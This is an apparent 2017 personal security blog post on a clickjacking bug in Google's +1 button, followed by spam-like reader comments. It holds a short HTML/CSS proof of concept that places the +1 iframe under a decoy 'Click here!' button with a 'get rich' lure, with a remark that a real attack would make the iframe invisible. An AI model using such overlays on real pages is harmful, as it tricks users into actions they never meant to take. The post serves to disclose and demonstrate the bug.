Sunday, 16 July 2017

Google G+1 ClickJacking BUG





The previous basic introduction tutorial - https://www.youtube.com/watch?v=cbgNHnMsaPg&t=192s



The snippet -

<style>
iframe { /* iframe from the victim site */
  width: 400px;
  height: 100px;
  position: absolute;
  top:0; left:0px;
  opacity: 1; /* in real opacity:0 */
  z-index: 1;
}
</style>

<div>Click to get rich now:</div>

<!-- The url from the victim site -->
<iframe src="https://plusone.google.com/_/+1/fastbutton?bsv&size=medium&hl=en-US&url=https://engineering.linkedin.com/security/our-private-bug-bounty-program-reducing-vulnerabilities-leveraging-expert-crowds"></iframe>

<button>Click here!</button>

<div>...And you're cool (I'm a cool hacker actually)!</div> 

............................................................


Other Posts -






Cross Site Scripting (XSS) - 6 (Reflected XSS at its best)

Create Unlimited Instagram Accounts (unvalidated verification)


4 comments:

  1. Oh great,
    Looking nice information learned a lot from your blog.
    Need updates like this plz do keep sharing on...
    Digital Marketing Online Training | SEO Online Training | Google Analytics Online Training | Doubleclick for Publishers Training

    ReplyDelete
  2. Love to read it,Waiting For More new Update and Keep Sharing This Type Of Blog Thank You..,

    Best Software Training Institute in Chennai

    Best Online Training Institute in Chennai

    ReplyDelete
  3. It is very useful for me to learn and understand easily. Thanks for sharing your valuable information and time.

    CEH Training In Hyderbad

    ReplyDelete